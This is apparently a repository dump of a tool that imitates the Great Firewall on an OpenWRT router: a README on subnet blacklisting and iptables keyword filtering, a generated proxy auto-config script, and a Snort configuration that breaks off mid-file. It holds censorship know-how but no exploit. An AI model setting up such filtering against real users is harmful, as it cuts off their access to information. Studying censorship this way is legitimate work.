has a list of blacklisted subnets. All traffic to those are rejected 148 | by `iptables`. 149 | 150 | The generation tool gathers such subnets by looking up several online resources and making DNS queries to a list of blacklisted domains. 151 | 152 | ### Keyword Censoring 153 | 154 | Reluctant to deploy a transparent proxy, currently it is implemented using 155 | the string matcher of `iptables`, which requires `iptables-mod-filter` on 156 | OpenWRT. 157 | 158 | For some reason, currently it only works for UDP but not TCP traffic. We 159 | don't know why. 160 | 161 | ### Prevention of Bypassing 162 | 163 | The implementation does not intend to simulate the behaviour on this aspect 164 | much. Theoretically, if string matching does work, unencrypted HTTP proxies to 165 | blacklisted domains should be rejected by KEYWORDS module. 166 | 167 | This implementation does not simulate the behaviour of GFW against famous 168 | ways to bypass censorship, including but not limited to: 169 | 170 | + SSH Tunneling 171 | + Tor 172 | + OpenVPN 173 | + ... 174 | 175 | It does block several ports to prevent PPTP & L2TP connections though. 176 | 177 | ## Notes 178 | 179 | Other alternatives to imitate a GFW: 180 | 181 | + [DumbHosts](https://github.com/phoeagon/dumbhosts) 182 | + [GFW-PAC](https://github.com/phoeagon/gfw-pac) 183 | 184 | ## F.A.Q. 185 | 186 | N/A 187 | -------------------------------------------------------------------------------- /dns_poisoning/resources/abp.js: -------------------------------------------------------------------------------- 1 | // Generated by gfwlist2pac in precise mode 2 | // https://github.com/clowwindy/gfwlist2pac 3 | 4 | var proxy = __PROXY__; 5 | 6 | var rules = __RULES__; 7 | 8 | /* 9 | * This file is part of Adblock Plus , 10 | * Copyright (C) 2006-2014 Eyeo GmbH 11 | * 12 | * Adblock Plus is free software: you can redistribute it and/or modify 13 | * it under the terms of the GNU General Public License version 3 as 14 | * published by the Free Software Foundation. 15 | * 16 | * Adblock Plus is distributed in the hope that it will be useful, 17 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | * GNU General Public License for more details. 20 | * 21 | * You should have received a copy of the GNU General Public License 22 | * along with Adblock Plus. If not, see . 23 | */ 24 | 25 | function createDict() 26 | { 27 | var result = {}; 28 | result.__proto__ = null; 29 | return result; 30 | } 31 | 32 | function getOwnPropertyDescriptor(obj, key) 33 | { 34 | if (obj.hasOwnProperty(key)) 35 | { 36 | return obj[key]; 37 | } 38 | return null; 39 | } 40 | 41 | function extend(subclass, superclass, definition) 42 | { 43 | if (Object.__proto__) 44 | { 45 | definition.__proto__ = superclass.prototype; 46 | subclass.prototype = definition; 47 | } 48 | else 49 | { 50 | var tmpclass = function(){}, ret; 51 | tmpclass.prototype = superclass.prototype; 52 | subclass.prototype = new tmpclass(); 53 | subclass.prototype.constructor = superclass; 54 | for (var i in definition) 55 | { 56 | if (definition.hasOwnProperty(i)) 57 | { 58 | subclass.prototype[i] = definition[i]; 59 | } 60 | } 61 | } 62 | } 63 | 64 | function Filter(text) 65 | { 66 | this.text = text; 67 | this.subscriptions = []; 68 | } 69 | Filter.prototype = { 70 | text: null, 71 | subscriptions: null, 72 | toString: function() 73 | { 74 | return this.text; 75 | } 76 | }; 77 | Filter.knownFilters = createDict(); 78 | Filter.elemhideRegExp = /^([^\/\*\|\@"!]*?)#(\@)?(?:([\w\-]+|\*)((?:\([\w\-]+(?:[$^*]?=[^\(\)"]*)?\))*)|#([^{}]+))$/; 79 | Filter.regexpRegExp = /^(@@)?\/.*\/(?:\$~?[\w\-]+(?:=[^,\s]+)?(?:,~?[\w\-]+(?:=[^,\s]+)?)*)?$/; 80 | Filter.optionsRegExp = /\$(~?[\w\-]+(?:=[^,\s]+)?(?:,~?[\w\-]+(?:=[^,\s]+)?)*)$/; 81 | Filter.fromText = function(text) 82 | { 83 | if (text in Filter.knownFilters) 84 | { 85 | return Filter.knownFilters[text]; 86 | } 87 | var ret; 88 | if (text[0] == "!") 89 | { 90 | ret = new CommentFilter(text); 91 | } 92 | else 93 | { 94 | ret = RegExpFilter.fromText(text); 95 | } 96 | Filter.knownFilters[ret.text] = ret; 97 | return ret; 98 | }; 99 | 100 | function InvalidFilter(text, reason) 101 | { 102 | Filter.call(this, text); 103 | this.reason = reason; 104 | } 105 | extend(InvalidFilter, Filter, { 106 | reason: null 107 | }); 108 | 109 | function CommentFilter(text) 110 | { 111 | Filter.call(this, text); 112 | } 113 | extend(CommentFilter, Filter, { 114 | }); 115 | 116 | function ActiveFilter(text, domains) 117 | { 118 | Filter.call(this, text); 119 | this.domainSource = domains; 120 | } 121 | extend(ActiveFilter, Filter, { 122 | domainSource: null, 123 | domainSeparator: null, 124 | ignoreTrailingDot: true, 125 | domainSourceIsUpperCase: false, 126 | getDomains: function() 127 | { 128 | var prop = getOwnPropertyDescriptor(this, "domains"); 129 | if (prop) 130 | { 131 | return prop; 132 | } 133 | var domains = null; 134 | if (this.domainSource) 135 | { 136 | var source = this.domainSource; 137 | if (!this.domainSourceIsUpperCase) 138 | { 139 | source = source.toUpperCase(); 140 | } 141 | var list = source.split(this.domainSeparator); 142 | if (list.length == 1 && list[0][0] != "~") 143 | { 144 | domains = createDict(); 145 | domains[""] = false; 146 | if (this.ignoreTrailingDot) 147 | { 148 | list[0] = list[0].replace(/\.+$/, ""); 149 | } 150 | domains[list[0]] = true; 151 | } 152 | else 153 | { 154 | var hasIncludes = false; 155 | for (var i = 0; i < list.length; i++) 156 | { 157 | var domain = list[i]; 158 | if (this.ignoreTrailingDot) 159 | { 160 | domain = domain.replace(/\.+$/, ""); 161 | } 162 | if (domain == "") 163 | { 164 | continue; 165 | } 166 | var include; 167 | if (domain[0] == "~") 168 | { 169 | include = false; 170 | domain = domain.substr(1); 171 | } 172 | else 173 | { 174 | include = true; 175 | hasIncludes = true; 176 | } 177 | if (!domains) 178 | { 179 | domains = createDict(); 180 | } 181 | domains[domain] = include; 182 | } 183 | domains[""] = !hasIncludes; 184 | } 185 | this.domainSource = null; 186 | } 187 | return this.domains; 188 | }, 189 | sitekeys: null, 190 | isActiveOnDomain: function(docDomain, sitekey) 191 | { 192 | if (this.getSitekeys() && (!sitekey || this.getSitekeys().indexOf(sitekey.toUpperCase()) < 0)) 193 | { 194 | return false; 195 | } 196 | if (!this.getDomains()) 197 | { 198 | return true; 199 | } 200 | if (!docDomain) 201 | { 202 | return this.getDomains()[""]; 203 | } 204 | if (this.ignoreTrailingDot) 205 | { 206 | docDomain = docDomain.replace(/\.+$/, ""); 207 | } 208 | docDomain = docDomain.toUpperCase(); 209 | while (true) 210 | { 211 | if (docDomain in this.getDomains()) 212 | { 213 | return this.domains[docDomain]; 214 | } 215 | var nextDot = docDomain.indexOf("."); 216 | if (nextDot < 0) 217 | { 218 | break; 219 | } 220 | docDomain = docDomain.substr(nextDot + 1); 221 | } 222 | return this.domains[""]; 223 | }, 224 | isActiveOnlyOnDomain: function(docDomain) 225 | { 226 | if (!docDomain || !this.getDomains() || this.getDomains()[""]) 227 | { 228 | return false; 229 | } 230 | if (this.ignoreTrailingDot) 231 | { 232 | docDomain = docDomain.replace(/\.+$/, ""); 233 | } 234 | docDomain = docDomain.toUpperCase(); 235 | for (var domain in this.getDomains()) 236 | { 237 | if (this.domains[domain] && domain != docDomain && (domain.length <= docDomain.length || domain.indexOf("." + docDomain) != domain.length - docDomain.length - 1)) 238 | { 239 | return false; 240 | } 241 | } 242 | return true; 243 | } 244 | }); 245 | 246 | function RegExpFilter(text, regexpSource, contentType, matchCase, domains, thirdParty, sitekeys) 247 | { 248 | ActiveFilter.call(this, text, domains, sitekeys); 249 | if (contentType != null) 250 | { 251 | this.contentType = contentType; 252 | } 253 | if (matchCase) 254 | { 255 | this.matchCase = matchCase; 256 | } 257 | if (thirdParty != null) 258 | { 259 | this.thirdParty = thirdParty; 260 | } 261 | if (sitekeys != null) 262 | { 263 | this.sitekeySource = sitekeys; 264 | } 265 | if (regexpSource.length >= 2 && regexpSource[0] == "/" && regexpSource[regexpSource.length - 1] == "/") 266 | { 267 | var regexp = new RegExp(regexpSource.substr(1, regexpSource.length - 2), this.matchCase ? "" : "i"); 268 | this.regexp = regexp; 269 | } 270 | else 271 | { 272 | this.regexpSource = regexpSource; 273 | } 274 | } 275 | extend(RegExpFilter, ActiveFilter, { 276 | domainSourceIsUpperCase: true, 277 | length: 1, 278 | domainSeparator: "|", 279 | regexpSource: null, 280 | getRegexp: function() 281 | { 282 | var prop = getOwnPropertyDescriptor(this, "regexp"); 283 | if (prop) 284 | { 285 | return prop; 286 | } 287 | var source = this.regexpSource.replace(/\*+/g, "*").replace(/\^\|$/, "^").replace(/\W/g, "\\$&").replace(/\\\*/g, ".*").replace(/\\\^/g, "(?:[\\x00-\\x24\\x26-\\x2C\\x2F\\x3A-\\x40\\x5B-\\x5E\\x60\\x7B-\\x7F]|$)").replace(/^\\\|\\\|/, "^[\\w\\-]+:\\/+(?!\\/)(?:[^\\/]+\\.)?").replace(/^\\\|/, "^").replace(/\\\|$/, "$").replace(/^(\.\*)/, "").replace(/(\.\*)$/, ""); 288 | var regexp = new RegExp(source, this.matchCase ? "" : "i"); 289 | this.regexp = regexp; 290 | return regexp; 291 | }, 292 | contentType: 2147483647, 293 | matchCase: false, 294 | thirdParty: null, 295 | sitekeySource: null, 296 | getSitekeys: function() 297 | { 298 | var prop = getOwnPropertyDescriptor(this, "sitekeys"); 299 | if (prop) 300 | { 301 | return prop; 302 | } 303 | var sitekeys = null; 304 | if (this.sitekeySource) 305 | { 306 | sitekeys = this.sitekeySource.split("|"); 307 | this.sitekeySource = null; 308 | } 309 | this.sitekeys = sitekeys; 310 | return this.sitekeys; 311 | }, 312 | matches: function(location, contentType, docDomain, thirdParty, sitekey) 313 | { 314 | if (this.getRegexp().test(location) && this.isActiveOnDomain(docDomain, sitekey)) 315 | { 316 | return true; 317 | } 318 | return false; 319 | } 320 | }); 321 | RegExpFilter.prototype["0"] = "#this"; 322 | RegExpFilter.fromText = function(text) 323 | { 324 | var blocking = true; 325 | var origText = text; 326 | if (text.indexOf("@@") == 0) 327 | { 328 | blocking = false; 329 | text = text.substr(2); 330 | } 331 | var contentType = null; 332 | var matchCase = null; 333 | var domains = null; 334 | var sitekeys = null; 335 | var thirdParty = null; 336 | var collapse = null; 337 | var options; 338 | var match = text.indexOf("$") >= 0 ? Filter.optionsRegExp.exec(text) : null; 339 | if (match) 340 | { 341 | options = match[1].toUpperCase().split(","); 342 | text = match.input.substr(0, match.index); 343 | for (var _loopIndex6 = 0; _loopIndex6 < options.length; ++_loopIndex6) 344 | { 345 | var option = options[_loopIndex6]; 346 | var value = null; 347 | var separatorIndex = option.indexOf("="); 348 | if (separatorIndex >= 0) 349 | { 350 | value = option.substr(separatorIndex + 1); 351 | option = option.substr(0, separatorIndex); 352 | } 353 | option = option.replace(/-/, "_"); 354 | if (option in RegExpFilter.typeMap) 355 | { 356 | if (contentType == null) 357 | { 358 | contentType = 0; 359 | } 360 | contentType |= RegExpFilter.typeMap[option]; 361 | } 362 | else if (option[0] == "~" && option.substr(1) in RegExpFilter.typeMap) 363 | { 364 | if (contentType == null) 365 | { 366 | contentType = RegExpFilter.prototype.contentType; 367 | } 368 | contentType &= ~RegExpFilter.typeMap[option.substr(1)]; 369 | } 370 | else if (option == "MATCH_CASE") 371 | { 372 | matchCase = true; 373 | } 374 | else if (option == "~MATCH_CASE") 375 | { 376 | matchCase = false; 377 | } 378 | else if (option == "DOMAIN" && typeof value != "undefined") 379 | { 380 | domains = value; 381 | } 382 | else if (option == "THIRD_PARTY") 383 | { 384 | thirdParty = true; 385 | } 386 | else if (option == "~THIRD_PARTY") 387 | { 388 | thirdParty = false; 389 | } 390 | else if (option == "COLLAPSE") 391 | { 392 | collapse = true; 393 | } 394 | else if (option == "~COLLAPSE") 395 | { 396 | collapse = false; 397 | } 398 | else if (option == "SITEKEY" && typeof value != "undefined") 399 | { 400 | sitekeys = value; 401 | } 402 | else 403 | { 404 | return new InvalidFilter(origText, "Unknown option " + option.toLowerCase()); 405 | } 406 | } 407 | } 408 | if (!blocking && (contentType == null || contentType & RegExpFilter.typeMap.DOCUMENT) && (!options || options.indexOf("DOCUMENT") < 0) && !/^\|?[\w\-]+:/.test(text)) 409 | { 410 | if (contentType == null) 411 | { 412 | contentType = RegExpFilter.prototype.contentType; 413 | } 414 | contentType &= ~RegExpFilter.typeMap.DOCUMENT; 415 | } 416 | try 417 | { 418 | if (blocking) 419 | { 420 | return new BlockingFilter(origText, text, contentType, matchCase, domains, thirdParty, sitekeys, collapse); 421 | } 422 | else 423 | { 424 | return new WhitelistFilter(origText, text, contentType, matchCase, domains, thirdParty, sitekeys); 425 | } 426 | } 427 | catch (e) 428 | { 429 | return new InvalidFilter(origText, e); 430 | } 431 | }; 432 | RegExpFilter.typeMap = { 433 | OTHER: 1, 434 | SCRIPT: 2, 435 | IMAGE: 4, 436 | STYLESHEET: 8, 437 | OBJECT: 16, 438 | SUBDOCUMENT: 32, 439 | DOCUMENT: 64, 440 | XBL: 1, 441 | PING: 1, 442 | XMLHTTPREQUEST: 2048, 443 | OBJECT_SUBREQUEST: 4096, 444 | DTD: 1, 445 | MEDIA: 16384, 446 | FONT: 32768, 447 | BACKGROUND: 4, 448 | POPUP: 268435456, 449 | ELEMHIDE: 1073741824 450 | }; 451 | RegExpFilter.prototype.contentType &= ~ (RegExpFilter.typeMap.ELEMHIDE | RegExpFilter.typeMap.POPUP); 452 | 453 | function BlockingFilter(text, regexpSource, contentType, matchCase, domains, thirdParty, sitekeys, collapse) 454 | { 455 | RegExpFilter.call(this, text, regexpSource, contentType, matchCase, domains, thirdParty, sitekeys); 456 | this.collapse = collapse; 457 | } 458 | extend(BlockingFilter, RegExpFilter, { 459 | collapse: null 460 | }); 461 | 462 | function WhitelistFilter(text, regexpSource, contentType, matchCase, domains, thirdParty, sitekeys) 463 | { 464 | RegExpFilter.call(this, text, regexpSource, contentType, matchCase, domains, thirdParty, sitekeys); 465 | } 466 | extend(WhitelistFilter, RegExpFilter, { 467 | }); 468 | 469 | function Matcher() 470 | { 471 | this.clear(); 472 | } 473 | Matcher.prototype = { 474 | filterByKeyword: null, 475 | keywordByFilter: null, 476 | clear: function() 477 | { 478 | this.filterByKeyword = createDict(); 479 | this.keywordByFilter = createDict(); 480 | }, 481 | add: function(filter) 482 | { 483 | if (filter.text in this.keywordByFilter) 484 | { 485 | return; 486 | } 487 | var keyword = this.findKeyword(filter); 488 | var oldEntry = this.filterByKeyword[keyword]; 489 | if (typeof oldEntry == "undefined") 490 | { 491 | this.filterByKeyword[keyword] = filter; 492 | } 493 | else if (oldEntry.length == 1) 494 | { 495 | this.filterByKeyword[keyword] = [oldEntry, filter]; 496 | } 497 | else 498 | { 499 | oldEntry.push(filter); 500 | } 501 | this.keywordByFilter[filter.text] = keyword; 502 | }, 503 | remove: function(filter) 504 | { 505 | if (!(filter.text in this.keywordByFilter)) 506 | { 507 | return; 508 | } 509 | var keyword = this.keywordByFilter[filter.text]; 510 | var list = this.filterByKeyword[keyword]; 511 | if (list.length <= 1) 512 | { 513 | delete this.filterByKeyword[keyword]; 514 | } 515 | else 516 | { 517 | var index = list.indexOf(filter); 518 | if (index >= 0) 519 | { 520 | list.splice(index, 1); 521 | if (list.length == 1) 522 | { 523 | this.filterByKeyword[keyword] = list[0]; 524 | } 525 | } 526 | } 527 | delete this.keywordByFilter[filter.text]; 528 | }, 529 | findKeyword: function(filter) 530 | { 531 | var result = ""; 532 | var text = filter.text; 533 | if (Filter.regexpRegExp.test(text)) 534 | { 535 | return result; 536 | } 537 | var match = Filter.optionsRegExp.exec(text); 538 | if (match) 539 | { 540 | text = match.input.substr(0, match.index); 541 | } 542 | if (text.substr(0, 2) == "@@") 543 | { 544 | text = text.substr(2); 545 | } 546 | var candidates = text.toLowerCase().match(/[^a-z0-9%*][a-z0-9%]{3,}(?=[^a-z0-9%*])/g); 547 | if (!candidates) 548 | { 549 | return result; 550 | } 551 | var hash = this.filterByKeyword; 552 | var resultCount = 16777215; 553 | var resultLength = 0; 554 | for (var i = 0, l = candidates.length; i < l; i++) 555 | { 556 | var candidate = candidates[i].substr(1); 557 | var count = candidate in hash ? hash[candidate].length : 0; 558 | if (count < resultCount || count == resultCount && candidate.length > resultLength) 559 | { 560 | result = candidate; 561 | resultCount = count; 562 | resultLength = candidate.length; 563 | } 564 | } 565 | return result; 566 | }, 567 | hasFilter: function(filter) 568 | { 569 | return filter.text in this.keywordByFilter; 570 | }, 571 | getKeywordForFilter: function(filter) 572 | { 573 | if (filter.text in this.keywordByFilter) 574 | { 575 | return this.keywordByFilter[filter.text]; 576 | } 577 | else 578 | { 579 | return null; 580 | } 581 | }, 582 | _checkEntryMatch: function(keyword, location, contentType, docDomain, thirdParty, sitekey) 583 | { 584 | var list = this.filterByKeyword[keyword]; 585 | for (var i = 0; i < list.length; i++) 586 | { 587 | var filter = list[i]; 588 | if (filter == "#this") 589 | { 590 | filter = list; 591 | } 592 | if (filter.matches(location, contentType, docDomain, thirdParty, sitekey)) 593 | { 594 | return filter; 595 | } 596 | } 597 | return null; 598 | }, 599 | matchesAny: function(location, contentType, docDomain, thirdParty, sitekey) 600 | { 601 | var candidates = location.toLowerCase().match(/[a-z0-9%]{3,}/g); 602 | if (candidates === null) 603 | { 604 | candidates = []; 605 | } 606 | candidates.push(""); 607 | for (var i = 0, l = candidates.length; i < l; i++) 608 | { 609 | var substr = candidates[i]; 610 | if (substr in this.filterByKeyword) 611 | { 612 | var result = this._checkEntryMatch(substr, location, contentType, docDomain, thirdParty, sitekey); 613 | if (result) 614 | { 615 | return result; 616 | } 617 | } 618 | } 619 | return null; 620 | } 621 | }; 622 | 623 | function CombinedMatcher() 624 | { 625 | this.blacklist = new Matcher(); 626 | this.whitelist = new Matcher(); 627 | this.resultCache = createDict(); 628 | } 629 | CombinedMatcher.maxCacheEntries = 1000; 630 | CombinedMatcher.prototype = { 631 | blacklist: null, 632 | whitelist: null, 633 | resultCache: null, 634 | cacheEntries: 0, 635 | clear: function() 636 | { 637 | this.blacklist.clear(); 638 | this.whitelist.clear(); 639 | this.resultCache = createDict(); 640 | this.cacheEntries = 0; 641 | }, 642 | add: function(filter) 643 | { 644 | if (filter instanceof WhitelistFilter) 645 | { 646 | this.whitelist.add(filter); 647 | } 648 | else 649 | { 650 | this.blacklist.add(filter); 651 | } 652 | if (this.cacheEntries > 0) 653 | { 654 | this.resultCache = createDict(); 655 | this.cacheEntries = 0; 656 | } 657 | }, 658 | remove: function(filter) 659 | { 660 | if (filter instanceof WhitelistFilter) 661 | { 662 | this.whitelist.remove(filter); 663 | } 664 | else 665 | { 666 | this.blacklist.remove(filter); 667 | } 668 | if (this.cacheEntries > 0) 669 | { 670 | this.resultCache = createDict(); 671 | this.cacheEntries = 0; 672 | } 673 | }, 674 | findKeyword: function(filter) 675 | { 676 | if (filter instanceof WhitelistFilter) 677 | { 678 | return this.whitelist.findKeyword(filter); 679 | } 680 | else 681 | { 682 | return this.blacklist.findKeyword(filter); 683 | } 684 | }, 685 | hasFilter: function(filter) 686 | { 687 | if (filter instanceof WhitelistFilter) 688 | { 689 | return this.whitelist.hasFilter(filter); 690 | } 691 | else 692 | { 693 | return this.blacklist.hasFilter(filter); 694 | } 695 | }, 696 | getKeywordForFilter: function(filter) 697 | { 698 | if (filter instanceof WhitelistFilter) 699 | { 700 | return this.whitelist.getKeywordForFilter(filter); 701 | } 702 | else 703 | { 704 | return this.blacklist.getKeywordForFilter(filter); 705 | } 706 | }, 707 | isSlowFilter: function(filter) 708 | { 709 | var matcher = filter instanceof WhitelistFilter ? this.whitelist : this.blacklist; 710 | if (matcher.hasFilter(filter)) 711 | { 712 | return !matcher.getKeywordForFilter(filter); 713 | } 714 | else 715 | { 716 | return !matcher.findKeyword(filter); 717 | } 718 | }, 719 | matchesAnyInternal: function(location, contentType, docDomain, thirdParty, sitekey) 720 | { 721 | var candidates = location.toLowerCase().match(/[a-z0-9%]{3,}/g); 722 | if (candidates === null) 723 | { 724 | candidates = []; 725 | } 726 | candidates.push(""); 727 | var blacklistHit = null; 728 | for (var i = 0, l = candidates.length; i < l; i++) 729 | { 730 | var substr = candidates[i]; 731 | if (substr in this.whitelist.filterByKeyword) 732 | { 733 | var result = this.whitelist._checkEntryMatch(substr, location, contentType, docDomain, thirdParty, sitekey); 734 | if (result) 735 | { 736 | return result; 737 | } 738 | } 739 | if (substr in this.blacklist.filterByKeyword && blacklistHit === null) 740 | { 741 | blacklistHit = this.blacklist._checkEntryMatch(substr, location, contentType, docDomain, thirdParty, sitekey); 742 | } 743 | } 744 | return blacklistHit; 745 | }, 746 | matchesAny: function(location, docDomain) 747 | { 748 | var key = location + " " + docDomain + " "; 749 | if (key in this.resultCache) 750 | { 751 | return this.resultCache[key]; 752 | } 753 | var result = this.matchesAnyInternal(location, 0, docDomain, null, null); 754 | if (this.cacheEntries >= CombinedMatcher.maxCacheEntries) 755 | { 756 | this.resultCache = createDict(); 757 | this.cacheEntries = 0; 758 | } 759 | this.resultCache[key] = result; 760 | this.cacheEntries++; 761 | return result; 762 | } 763 | }; 764 | var defaultMatcher = new CombinedMatcher(); 765 | 766 | var direct = 'DIRECT;'; 767 | 768 | for (var i = 0; i < rules.length; i++) { 769 | defaultMatcher.add(Filter.fromText(rules[i])); 770 | } 771 | 772 | function FindProxyForURL(url, host) { 773 | if (defaultMatcher.matchesAny(url, host) instanceof BlockingFilter) { 774 | return proxy; 775 | } 776 | return direct; 777 | } 778 | -------------------------------------------------------------------------------- /misc-snort/etc/snort/snort.gfw.conf: -------------------------------------------------------------------------------- 1 | #-------------------------------------------------- 2 | # VRT Rule Packages Snort.conf 3 | # 4 | # For more information visit us at: 5 | # http://www.snort.org Snort Website 6 | # http://vrt-sourcefire.blogspot.com/ Sourcefire VRT Blog 7 | # 8 | # Mailing list Contact: snort-sigs@lists.sourceforge.net 9 | # False Positive reports: fp@sourcefire.com 10 | # Snort bugs: bugs@snort.org 11 | # 12 | # Compatible with Snort Versions: 13 | # VERSIONS : 2.9.2.2 14 | # 15 | # Snort build options: 16 | # OPTIONS : --enable-ipv6 --enable-gre --enable-mpls --enable-targetbased --enable-decoder-preprocessor-rules --enable-ppm --enable-perfprofiling --enable-zlib --enable-active-response --enable-normalizer --enable-reload --enable-react --enable-flexresp3 17 | # 18 | # Additional information: 19 | # This configuration file enables active response, to run snort in 20 | # test mode -T you are required to supply an interface -i 21 | # or test mode will fail to fully validate the configuration and 22 | # exit with a FATAL error 23 | #! 24 | #! OpenWrt: 25 | #! Some options in this config were changed to adapt snort for OpenWrt. Any changes 26 | #! made to the original default configuration will start with '#! ' so you can track 27 | #! the changes. 28 | #! 29 | #! Most preprocessors and rules were disabled to save memory. 30 | #-------------------------------------------------- 31 | 32 | ################################################### 33 | # This file contains a sample snort configuration. 34 | # You should take the following steps to create your own custom configuration: 35 | # 36 | # 1) Set the network variables. 37 | # 2) Configure the decoder 38 | # 3) Configure the base detection engine 39 | # 4) Configure dynamic loaded libraries 40 | # 5) Configure preprocessors 41 | # 6) Configure output plugins 42 | # 7) Customize your rule set 43 | # 8) Customize preprocessor and decoder rule set 44 | # 9) Customize shared object rule set 45 | ################################################### 46 | 47 | ################################################### 48 | # Step #1: Set the network variables. For more information, see README.variables 49 | ################################################### 50 | 51 | # Setup the network addresses you are protecting 52 | #! ipvar HOME_NET any 53 | ipvar HOME_NET 192.168.1.0/24 54 | 55 | # Set up the external network addresses. Leave as "any" in most situations 56 | #! ipvar EXTERNAL_NET any 57 | ipvar EXTERNAL_NET !$HOME_NET 58 | 59 | # List of DNS servers on your network 60 | ipvar DNS_SERVERS $HOME_NET 61 | 62 | # List of SMTP servers on your network 63 | ipvar SMTP_SERVERS $HOME_NET 64 | 65 | # List of web servers on your network 66 | ipvar HTTP_SERVERS $HOME_NET 67 | 68 | # List of sql servers on your network 69 | ipvar SQL_SERVERS $HOME_NET 70 | 71 | # List of telnet servers on your network 72 | ipvar TELNET_SERVERS $HOME_NET 73 | 74 | # List of ssh servers on your network 75 | ipvar SSH_SERVERS $HOME_NET 76 | 77 | # List of ftp servers on your network 78 | ipvar FTP_SERVERS $HOME_NET 79 | 80 | # List of sip servers on your network 81 | ipvar SIP_SERVERS $HOME_NET 82 | 83 | # List of ports you run web servers on 84 | portvar HTTP_PORTS [80,81,311,591,593,901,1220,1414,1830,2301,2381,2809,3128,3702,4343,5250,7001,7145,7510,7777,7779,8000,8008,8014,8028,8080,8088,8118,8123,8180,8181,8243,8280,8800,8888,8899,9080,9090,9091,9443,9999,11371,55555] 85 | 86 | # List of ports you want to look for SHELLCODE on. 87 | portvar SHELLCODE_PORTS !80 88 | 89 | # List of ports you might see oracle attacks on 90 | portvar ORACLE_PORTS 1024: 91 | 92 | # List of ports you want to look for SSH connections on: 93 | portvar SSH_PORTS 22 94 | 95 | # List of ports you run ftp servers on 96 | portvar FTP_PORTS [21,2100,3535] 97 | 98 | # List of ports you run SIP servers on 99 | portvar SIP_PORTS [5060,5061,5600] 100 | 101 | # List of file data ports for file inspection 102 | portvar FILE_DATA_PORTS [$HTTP_PORTS,110,143] 103 | 104 | # List of GTP ports for GTP preprocessor 105 | portvar GTP_PORTS [2123,2152,3386] 106 | 107 | # other variables, these should not be modified 108 | ipvar AIM_SERVERS [64.12.24.0/23,64.12.28.0/23,64.12.161.0/24,64.12.163.0/24,64.12.200.0/24,205.188.3.0/24,205.188.5.0/24,205.188.7.0/24,205.188.9.0/24,205.188.153.0/24,205.188.179.0/24,205.188.248.0/24] 109 | 110 | # Path to your rules files (this can be a relative path) 111 | # Note for Windows users: You are advised to make this an absolute path, 112 | # such as: c:\snort\rules 113 | #! Those paths are relative to this snort.conf file. 114 | #! var RULE_PATH ../rules 115 | #! var SO_RULE_PATH ../so_rules 116 | #! var PREPROC_RULE_PATH ../preproc_rules 117 | var RULE_PATH ./rules 118 | var SO_RULE_PATH ./so_rules 119 | var PREPROC_RULE_PATH ./preproc_rules 120 | 121 | # If you are using reputation preprocessor set these 122 | # Currently there is a bug with relative paths, they are relative to where snort is 123 | # not relative to snort.conf like the above variables 124 | # This is completely inconsistent with how other vars work, BUG 89986 125 | # Set the absolute path appropriately 126 | #! var WHITE_LIST_PATH ../rules 127 | #! var BLACK_LIST_PATH ../rules 128 | var WHITE_LIST_PATH ./rules 129 | var BLACK_LIST_PATH ./rules 130 | 131 | ################################################### 132 | # Step #2: Configure the decoder. For more information, see README.decode 133 | ################################################### 134 | 135 | # Stop generic decode events: 136 | config disable_decode_alerts 137 | 138 | # Stop Alerts on experimental TCP options 139 | config disable_tcpopt_experimental_alerts 140 | 141 | # Stop Alerts on obsolete TCP options 142 | config disable_tcpopt_obsolete_alerts 143 | 144 | # Stop Alerts on T/TCP alerts 145 | config disable_tcpopt_ttcp_alerts 146 | 147 | # Stop Alerts on all other TCPOption type events: 148 | config disable_tcpopt_alerts 149 | 150 | # Stop Alerts on invalid ip options 151 | config disable_ipopt_alerts 152 | 153 | # Alert if value in length field (IP, TCP, UDP) is greater th elength of the packet 154 | # config enable_decode_oversized_alerts 155 | 156 | # Same as above, but drop packet if in Inline mode (requires enable_decode_oversized_alerts) 157 | # config enable_decode_oversized_drops 158 | 159 | # Configure IP / TCP checksum mode 160 | config checksum_mode: all 161 | 162 | # Configure maximum number of flowbit references. For more information, see README.flowbits 163 | # config flowbits_size: 64 164 | 165 | # Configure ports to ignore 166 | # config ignore_ports: tcp 21 6667:6671 1356 167 | # config ignore_ports: udp 1:17 53 168 | 169 | # Configure active response for non inline operation. For more information, see REAMDE.active 170 | # config response: eth0 attempts 2 171 | 172 | # Configure DAQ related options for inline operation. For more information, see README.daq 173 | # 174 | # config daq: 175 | # config daq_dir: 176 | # config daq_mode: 177 | # config daq_var: 178 | # 179 | # ::= pcap | afpacket | dump | nfq | ipq | ipfw 180 | # ::= read-file | passive | inline 181 | # ::= arbitrary = ::= path as to where to look for DAQ module so's 183 | # config daq: afpacket 184 | 185 | # Configure specific UID and GID to run snort as after dropping privs. For more information see snort -h command line options 186 | # 187 | # config set_gid: 188 | # config set_uid: 189 | 190 | # Configure default snaplen. Snort defaults to MTU of in use interface. For more information see README 191 | # 192 | # config snaplen: 193 | # 194 | 195 | # Configure default bpf_file to use for filtering what traffic reaches snort. For more information see snort -h command line options (-F) 196 | # 197 | # config bpf_file: 198 | # 199 | 200 | # Configure default log directory for snort to log to. For more information see snort -h command line options (-l) 201 | # 202 | # config logdir: 203 | 204 | 205 | ################################################### 206 | # Step #3: Configure the base detection engine. For more information, see README.decode 207 | ################################################### 208 | 209 | # Configure PCRE match limitations 210 | config pcre_match_limit: 3500 211 | config pcre_match_limit_recursion: 1500 212 | 213 | # Configure the detection engine See the Snort Manual, Configuring Snort - Includes - Config 214 | config detection: search-method ac-split search-optimize max-pattern-len 20 215 | 216 | # Configure the event queue. For more information, see README.event_queue 217 | config event_queue: max_queue 8 log 3 order_events content_length 218 | 219 | ################################################### 220 | ## Configure GTP if it is to be used. 221 | ## For more information, see README.GTP 222 | #################################################### 223 | 224 | # config enable_gtp 225 | 226 | ################################################### 227 | # Per packet and rule latency enforcement 228 | # For more information see README.ppm 229 | ################################################### 230 | 231 | # Per Packet latency configuration 232 | #config ppm: max-pkt-time 250, \ 233 | # fastpath-expensive-packets, \ 234 | # pkt-log 235 | 236 | # Per Rule latency configuration 237 | #config ppm: max-rule-time 200, \ 238 | # threshold 3, \ 239 | # suspend-expensive-rules, \ 240 | # suspend-timeout 20, \ 241 | # rule-log alert 242 | 243 | ################################################### 244 | # Configure Perf Profiling for debugging 245 | # For more information see README.PerfProfiling 246 | ################################################### 247 | 248 | #config profile_rules: print all, sort avg_ticks 249 | #config profile_preprocs: print all, sort avg_ticks 250 | 251 | ################################################### 252 | # Configure protocol aware flushing 253 | # For more information see README.stream5 254 | ################################################### 255 | config 